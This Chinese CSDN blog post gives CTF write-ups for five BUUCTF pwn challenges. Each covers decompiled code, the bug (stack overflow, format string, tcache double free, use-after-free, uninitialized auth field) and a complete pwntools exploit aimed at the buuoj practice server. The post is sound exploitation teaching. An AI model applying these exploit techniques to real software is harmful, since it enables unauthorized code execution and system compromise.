BUUCTF pwn wp 106 - 110

最新推荐文章于 2023-09-26 16:37:07 发布
最新推荐文章于 2023-09-26 16:37:07 发布
阅读量512 收藏
点赞数 2
分类专栏: PWN 文章标签: linux pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33976344/article/details/123171017
版权
这篇博客详细介绍了PicoCTF_2018_bufferoverflow_0中的缓冲区溢出漏洞利用,包括strcpy栈溢出技巧,以及利用fmt漏洞进行堆上内存控制,涉及xman_2019_format的fmt漏洞利用方法。通过pwn技术实现了对目标程序的控制和flag获取。
摘要由CSDN通过智能技术生成

picoctf_2018_buffer overflow 0

picoctf_2018_buffer overflow$ file PicoCTF_2018_buffer_overflow_0;checksec PicoCTF_2018_buffer_overflow_0
PicoCTF_2018_buffer_overflow_0: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=e1e24cdf757acbd04d095e531a40d044abed7e82, not stripped
[*] '/home/pwn/桌面/picoctf_2018_buffer overflow/PicoCTF_2018_buffer_overflow_0'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [esp-Ch] [ebp-1Ch]
  __gid_t v5; // [esp+0h] [ebp-10h]
  FILE *stream; // [esp+4h] [ebp-Ch]

  stream = fopen("flag.txt", "r");
  if ( !stream )
  {
    puts(
      "Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
    exit(0);
  }
  fgets(flag, 64, stream);
  signal(11, sigsegv_handler);
  v5 = getegid();
  setresgid(v5, v5, v5, v4);
  if ( argc <= 1 )
  {
    puts("This program takes 1 argument.");
  }
  else
  {
    vuln((char *)argv[1]);
    printf("Thanks! Received: %s", argv[1]);
  }
  return 0;
}

char *__cdecl vuln(char *src)
{
  char dest[24]; // [esp+0h] [ebp-18h] BYREF

  return strcpy(dest, src);
}

strcpy栈溢出

from pwn import *

filename = "./PicoCTF_2018_buffer_overflow_0"
elf = ELF(filename)
context(arch="i386", os="linux")

puts_plt = elf.plt['puts']
flag_addr = 0x0804A080

payload = cyclic(0x18 + 4) + p32(puts_plt) + p32(0) + p32(flag_addr)
print(payload)

aaaabaaacaaadaaaeaaafaaagaaa\xc0\x84\x04\x08\x00\x00\x00\x00\x80\xa0\x04\x08

ssh -p 25611 CTFMan@node4.buuoj.cn

在这里插入图片描述

xman_2019_format

xman_2019_format$ file xman_2019_format;checksec xman_2019_format 
xman_2019_format: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=3d39ec98164e323a164b7d12e0b76e1d4ce78838, stripped
[*] '/home/pwn/桌面/xman_2019_format/xman_2019_format'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

char *__cdecl sub_80485C4(char *s)
{
  char *v1; // eax
  char *result; // eax

  puts("...");
  v1 = strtok(s, "|");
  printf(v1);
  while ( 1 )
  {
    result = strtok(0, "|");
    if ( !result )
      break;
    printf(result);
  }
  return result;
}

fmt漏洞但是堆上的漏洞, strtok会把'|'去掉
在这里插入图片描述

在这里插入图片描述

漏洞利用: fmt漏洞任意地址写, 修改返回地址到后门, 这里需要爆破最低一字节的高四位(因为最低四位必定为C), 概率1/16

调试过程不放了, 堆fmt漏洞利用原理可以参考chuj师傅的blog, 讲的很好, 简单概括就是栈帧中ebp链的fmt两次利用, 可以修改ebp + 4地址处的返回地址到shell后门
https://www.cjovi.icu/WP/buu-xman_2019_format-wp.html

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 25469
filename = "./xman_2019_format"
elf = ELF(filename)
# libc = ELF("./")

def pwn():
    shell_addr_low_1byte = 0x85AB
    payload = '%12c%10$hhn|%' + str(shell_addr_low_1byte) + 'c%18$hn' 
    print(payload)
    payload = payload.encode()

    while True:
        io = remote(url, port)
        io.sendline(payload)
        try:
            io.sendline('echo pwned')
            io.recvuntil('pwned', timeout=0.5)
            io.interactive()
        except:
            io.close()

if __name__ == "__main__":
    pwn()

ciscn_2019_en_3

ciscn_2019_en_3$ file ciscn_2019_en_3;checksec ciscn_2019_en_3 
ciscn_2019_en_3: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=05f53753721f4d3327fe78fa244d276af22f4d70, stripped
[*] '/home/pwn/桌面/ciscn_2019_en_3/ciscn_2019_en_3'
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
    FORTIFY:  Enabled

保护全开

menu

  puts("Welcome to the story kingdom.");
  puts("What's your name?");
  read(0, buf, 0x20uLL);
  _printf_chk(1LL, (__int64)buf);
  puts("Please input your ID.");
  read(0, s, 8uLL);
  puts(s);

输入8个非0字符, 可以打印出栈帧

在这里插入图片描述

add

unsigned __int64 add()
{
  int idx; // ebx
  int size; // [rsp+4h] [rbp-1Ch] BYREF
  unsigned __int64 v3; // [rsp+8h] [rbp-18h]

  v3 = __readfsqword(0x28u);
  if ( cnt > 16 )
    puts("Enough!");
  puts("Please input the size of story: ");
  _isoc99_scanf("%d", &size);
  *((_DWORD *)&unk_202060 + 4 * cnt) = size;
  idx = cnt;
  *((_QWORD *)&unk_202068 + 2 * idx) = malloc(size);
  puts("please inpute the story: ");
  read(0, *((void **)&unk_202068 + 2 * cnt), size);
  ++cnt;
  puts("Done!");
  return __readfsqword(0x28u) ^ v3;
}

主结构体

struct stories {
	int size;
	char* story;
}

edit和show没用, 看看delete

unsigned __int64 delete()
{
  int v1; // [rsp+4h] [rbp-Ch] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-8h]

  v2 = __readfsqword(0x28u);
  puts("Please input the index:");
  _isoc99_scanf("%d", &v1);
  free(*((void **)&unk_202068 + 2 * v1));
  puts("Done!");
  return __readfsqword(0x28u) ^ v2;
}

有悬空指针, double free
漏洞利用
tcache attack - double free 打 free hook

from pwn import *
from pwnlib.term.readline import set_buffer
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 26090
filename = "./ciscn_2019_en_3"
elf = ELF(filename)
libc = ELF("./libc64-2.27.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

lf = lambda addrstring, address: log.info('{}: %#x'.format(addrstring), address)

def add(size,story):
    io.sendlineafter('choice:','1')
    io.sendlineafter('story:',str(size))
    io.sendlineafter('story:',story)
 
def delete(idx):
    io.sendlineafter('choice:','4')
    io.sendlineafter('index:',str(idx))

def pwn():
    io.sendlineafter('name?', 'fa1c4')
    # B()
    io.sendlineafter('ID.', b'f' * 8)
    set_buffer = u64(io.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00')) - 231
    lf('setbuffer address', set_buffer)
    libc_base = set_buffer - libc.sym['setbuffer']
    lf('libc base address', libc_base)
    system_addr = libc_base + libc.sym['system']
    free_hook = libc_base + libc.sym['__free_hook']

    add(0x20, 'chunk0')
    add(0x20, b'/bin/sh\x00')

    delete(0)
    delete(0) # double free
    # B()
    add(0x20, p64(free_hook))
    # B()
    add(0x20, 'whatever')
    add(0x20, p64(system_addr))

    delete(1)

if __name__ == "__main__":
    pwn()
    io.interactive()

bjdctf_2020_YDSneedGrirlfriend

bjdctf_2020_YDSneedGrirlfriend$ file bjdctf_2020_YDSneedGrirlfriend; checksec bjdctf_2020_YDSneedGrirlfriend 
bjdctf_2020_YDSneedGrirlfriend: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9b27216b491d0602378075540c37930a6c24435b, not stripped
[*] '/home/pwn/桌面/bjdctf_2020_YDSneedGrirlfriend/bjdctf_2020_YDSneedGrirlfriend'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

unsigned __int64 add_girlfriend()
{
  __int64 v0; // rbx
  int i; // [rsp+8h] [rbp-28h]
  int v3; // [rsp+Ch] [rbp-24h]
  char buf[8]; // [rsp+10h] [rbp-20h] BYREF
  unsigned __int64 v5; // [rsp+18h] [rbp-18h]

  v5 = __readfsqword(0x28u);
  if ( count <= 10 )
  {
    for ( i = 0; i <= 9; ++i )
    {
      if ( !*(&girlfriendlist + i) )
      {
        *(&girlfriendlist + i) = malloc(0x10uLL);
        if ( !*(&girlfriendlist + i) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        *(_QWORD *)*(&girlfriendlist + i) = print_girlfriend_name;
        printf("Her name size is :");
        read(0, buf, 8uLL);
        v3 = atoi(buf);
        v0 = (__int64)*(&girlfriendlist + i);
        *(_QWORD *)(v0 + 8) = malloc(v3);
        if ( !*((_QWORD *)*(&girlfriendlist + i) + 1) )
        {
          puts("Alloca Error");
          exit(-1);
        }
        printf("Her name is :");
        read(0, *((void **)*(&girlfriendlist + i) + 1), v3);
        puts("Success !Wow YDS get a girlfriend!");
        ++count;
        return __readfsqword(0x28u) ^ v5;
      }
    }
  }
  else
  {
    puts("Full");
  }
  return __readfsqword(0x28u) ^ v5;
}

数据结构

struct gf {
	void* function;
	char* name; 
}

unsigned __int64 del_girlfriend()
{
  int v1; // [rsp+Ch] [rbp-14h]
  char buf[8]; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v3; // [rsp+18h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  printf("Index :");
  read(0, buf, 4uLL);
  v1 = atoi(buf);
  if ( v1 >= 0 && v1 < count )
  {
    if ( *(&girlfriendlist + v1) )
    {
      free(*((void **)*(&girlfriendlist + v1) + 1));
      free(*(&girlfriendlist + v1));
      puts("Success");
    }
  }
  else
  {
    puts("Out of bound!");
  }
  return __readfsqword(0x28u) ^ v3;
}

悬空指针 UAF
另外还有个backdoor, 简单的堆风水, 把chunk0的函数指针劫持到back door即可

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 27715
filename = "./bjdctf_2020_YDSneedGrirlfriend"
elf = ELF(filename)
libc = ELF("./libc64-2.23.so")
context(arch="amd64", os="linux")
# context(arch="i386", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
    # context.terminal = ['tmux', 'splitw', '-h']
    # gdb.attach(io)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def add(size, name):
    io.sendlineafter('Your choice :', '1')
    io.sendafter('Her name size is :', str(size))
    io.sendafter('Her name is :', name)

def delete(idx):
    io.sendlineafter('Your choice :', '2')
    io.sendlineafter('Index :', str(idx))

def show(idx):
    io.sendlineafter('Your choice :', '3')
    io.sendlineafter('Index :', str(idx))

def pwn():
    back_door = 0x0000000000400B9C
    add(0x20, 'chunk0')
    add(0x20, 'chunk1')
    delete(0)
    delete(1)
    # B()
    add(0x10, p64(back_door))
    show(0)

if __name__ == "__main__":
    pwn()
    io.interactive()

picoctf_2018_are you root

picoctf_2018_are you root$ file PicoCTF_2018_are_you_root;checksec PicoCTF_2018_are_you_root
PicoCTF_2018_are_you_root: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=42ebad5f08a8e9d227f3783cc951f2737547e086, not stripped
[*] '/home/pwn/桌面/picoctf_2018_are you root/PicoCTF_2018_are_you_root'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

int __cdecl main(int argc, const char **argv, const char **envp)
{
  FILE *v3; // rdi
  unsigned int v5; // [rsp+1Ch] [rbp-224h]
  void **v6; // [rsp+20h] [rbp-220h]
  const char *nptr; // [rsp+28h] [rbp-218h]
  const char *nptra; // [rsp+28h] [rbp-218h]
  char s[6]; // [rsp+30h] [rbp-210h] BYREF
  char v10[3]; // [rsp+36h] [rbp-20Ah] BYREF
  char v11[511]; // [rsp+39h] [rbp-207h] BYREF
  unsigned __int64 v12; // [rsp+238h] [rbp-8h]

  v12 = __readfsqword(0x28u);
  v3 = stdout;
  setbuf(stdout, 0LL);
  menu(v3);
  v6 = 0LL;
  while ( 1 )
  {
    puts("\nEnter your command:");
    putchar(62);
    putchar(32);
    if ( !fgets(s, 512, stdin) )
      return 0;
    if ( !strncmp(s, "show", 4uLL) )
    {
      if ( v6 )
        printf("Logged in as %s [%u]\n", (const char *)*v6, *((unsigned int *)v6 + 2));
      else
        puts("Not logged in.");
    }
    else if ( !strncmp(s, "login", 5uLL) )
    {
      if ( v6 )
      {
        puts("Already logged in. Reset first.");
      }
      else
      {
        nptr = strtok(v10, "\n");
        if ( !nptr )
          goto LABEL_11;
        v6 = (void **)malloc(0x10uLL);
        if ( !v6 )
        {
          puts("malloc() returned NULL. Out of Memory\n");
          exit(-1);
        }
        *v6 = (void *)(int)strdup(nptr);
        printf("Logged in as \"%s\"\n", nptr);
      }
    }
    else if ( !strncmp(s, "set-auth", 8uLL) )
    {
      if ( v6 )
      {
        nptra = strtok(v11, "\n");
        if ( nptra )
        {
          v5 = strtoul(nptra, 0LL, 10);
          if ( v5 <= 4 )
          {
            *((_DWORD *)v6 + 2) = v5;
            printf("Set authorization level to \"%u\"\n", v5);
          }
          else
          {
            puts("Can only set authorization level below 5");
          }
        }
        else
        {
LABEL_11:
          puts("Invalid command");
        }
      }
      else
      {
        puts("Login first.");
      }
    }
    else if ( !strncmp(s, "get-flag", 8uLL) )
    {
      if ( v6 )
      {
        if ( *((_DWORD *)v6 + 2) == 5 )
          give_flag(s);
        else
          puts("Must have authorization level 5.");
      }
      else
      {
        puts("Login first!");
      }
    }
    else if ( !strncmp(s, "reset", 5uLL) )
    {
      if ( v6 )
      {
        free(*v6);
        v6 = 0LL;
        puts("Logged out!");
      }
      else
      {
        puts("Not logged in!");
      }
    }
    else
    {
      if ( !strncmp(s, "quit", 4uLL) )
        return 0;
      puts("Invalid option");
      menu("Invalid option");
    }
  }
}

在这里插入图片描述
想办法 login as level 5

分析程序流程, 关键位置是
在这里插入图片描述
看一下文档

char * strdup( const char *str1 );
	
Returns a pointer to a null-terminated byte string, which is a duplicate of the string pointed to by str1. 
The returned pointer must be passed to free to avoid a memory leak.

所以是复制字符串的函数, 程序这里就会分配一个chunk

在这里插入图片描述
而v6偏移8字节(*((_DWORD *)v6 + 2))处是auth的值, 这个值在程序开始不会进行初始化, 并且只在登录的时候验证, 这里就出现了逻辑漏洞
因为可以输入9字节的数据控制下一次login时的auth的值, 所以只要reset释放掉第一次的chunk, 申请回来相同的chunk时验证的auth就是可控的

from pwn import *
# from LibcSearcher import *

url, port = "node4.buuoj.cn", 25697
filename = "./PicoCTF_2018_are_you_root"
elf = ELF(filename)
context(arch="amd64", os="linux")

local = 0
if local:
    context.log_level = "debug"
    io = process(filename)
else:
    io = remote(url, port)

def B():
    gdb.attach(io)
    pause()

def pwn():
    io.sendlineafter('> ', 'login '.encode() + b'\x05' * 9)
    io.sendlineafter('> ', 'reset')
    io.sendlineafter('> ', 'login ' + 'falca')
    io.sendlineafter('> ', 'get-flag')

if __name__ == "__main__":
    pwn()
    io.interactive()
fa1c4
关注
专栏目录
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
buuoj Pwn wp 1-10
yongbaoii的博客
01-09 677
01 test_your_nc 直接连上就好了。 然后 cat flag 。 02 rip ret2text. 这题多多少少有点问题。 IDA里面是这样的,但是exp一直有问题,然后试着连上直接跑,是这样的。 栈溢出到返回地址就行。 from pwn import* r = remote("node3.buuoj.cn",26737) context.log_level = "debug" system_addr = 0x401187 payload = 'a' * 23 + p64(syste
[pwn]堆:堆风水与堆排布-babyfengshui
Breeze的博客
12-31 1万+
[pwn]堆:堆风水与堆排布-babyfengshui 所谓堆风水也叫作堆排布,其实说严格了并不是一种漏洞的利用方法,而是一种灵活布置堆块来控制堆布局的方法,在一些一些其他漏洞的利用中起到效果。通过一道经典的题目,由清华蓝莲花战队出的babyfengshui来看一下: babyfengshui 查看安全策略 没开PIE,但值得一提的是这是一个32位的程序,32位的堆是4字节对齐的。 查看程序逻辑 ...
pico ctf 2013 php3,picoCTFのpwn解析
weixin_39895977的博客
03-23 581
前言国庆期间得知了美国CMU主办的picoCTF比赛,出于最近做题的手感有所下降,借此比赛来复习下PWN相关的题型(题目的质量不错,而且题型很广,自我感觉相当棒的比赛)buffer overflow 0先检查一遍文件➜ bufferoverflow0 file vulnvuln: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), ...
picoctf_2018_buffer overflow 2
qq_62887641的博客
09-26 137
32位,只开了NX很简单的程序栈溢出并且有后门函数后门函数需要。
BUUCTF pwn wp 11 - 15
fa1c4的blog
08-17 452
ciscn_2019_n_8 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5);
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
mqtt-pwn:MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式服务
05-02
MQTT-PWN MQTT是一种机器对机器的连接协议,被设计为一种极其轻量级的发布/订阅消息传递,并已被全球数百万个IoT设备广泛使用。 MQTT-PWN打算成为IoT Broker渗透测试和安全评估操作的一站式商店,因为它结合了枚举...
buuctf pwn ubuntu20的自己搭建运行环境
11-15
pwn ubuntu20的自己搭建运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
几道buuctf pwn wp
weixin_44113469的博客
02-07 383
buuctf wp try_your_nc from pwn import * from sys import * debug=1 if debug: p=remote("node3.buuoj.cn",26062) else: p=process("xxx") p.interactive() pwn1_sctf_2016 C++ 写的,害,输入I, 会转换为you,所以有溢出啊,还有后面函数 from pwn import * from sys import * debug=1 c
BUUCTF pwn wp 71 - 75
fa1c4的blog
11-16 592
ciscn_2019_final_3 picoctf_2018_shellcode jarvisoj_level5 npuctf_2020_easyheap hitcontraining_bamboobox
Buuctf pwn1 详细wp
anxiong1803的博客
09-19 2591
目录 程序基本信息 程序溢出点 确定返回地址 编写exp脚本 成功getshell 程序基本信息 我们可以看到这是一个64程序,没有保护开启。 程序溢出点 gets函数可以读取无限字符,存在栈溢出。 接下来我们测测需要多少字符长度可以溢出...
BUUCTF PWN部分题目wp
awxnutpgs545144602的博客
08-16 2016
pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda计算偏移为23,写脚本 from pwn import* sh=remote('f.b...
BUUCTF pwn wp 86 - 90
fa1c4的blog
01-17 646
mrctf2020_shellcode_revenge 一道经典题目, 可见字符shellcode. F5失败直接读汇编 ; Attributes: bp-based frame ; int __cdecl main(int argc, const char **argv, const char **envp) public main main proc near buf= byte ptr -410h var_8= dword ptr -8 var_4= dword ptr -4 ; __unwi
CTF-PWN-HouseOfGrey(栈溢出+maps泄露地址+mem泄露内存)
SuperGate的博客
01-27 1178
程序概述 [*] '/home/supergate/Desktop/Pwn/pwn' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 查看程序保护后发现保护全开 supergate...
一次不用脚本的pwn解题
蚁景网安学院
03-03 766
0x01:前言我们在 ctf 中 ,更多的是在 web方向中会 使用到 linux 中的/proc 目录,这里将对它进行一次介绍与学习,并且最后再举一次pwn中 运用到它的一次实例记录....
pwntools使用简介
热门推荐
jmp esp
05-07 4万+
0x01 pwntools?pwntools是一个ctf框架和漏洞利用开发库,用Python开发,由rapid设计,旨在让使用者简单快速的编写exploit。pwntools下载:https://pwntools.com/ 文档在线:http://pwntools.readthedocs.io/en/latest/0x02 使用简介官网的一个简单样例from pwn import * contex
BUUCTF pwn wp 136 - 140
fa1c4的blog
04-28 557
pwnable_asm picoctf_2018_echooo jarvisoj_level6_x64 npuctf_2020_level2 [2020 新春红包题]3
BUUCTF pwn rip
最新发布
01-28
根据提供的引用内容,BUUCTF PWN-RIP是一个关于PWN技术的详解文章。文章中提到了64位的EIF文件中rbp寄存器的大小为8个字节。如果对这部分不太理解,可以阅读作者的另一篇关于PWN基础知识的文章。 BUUCTF PWN-RIP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值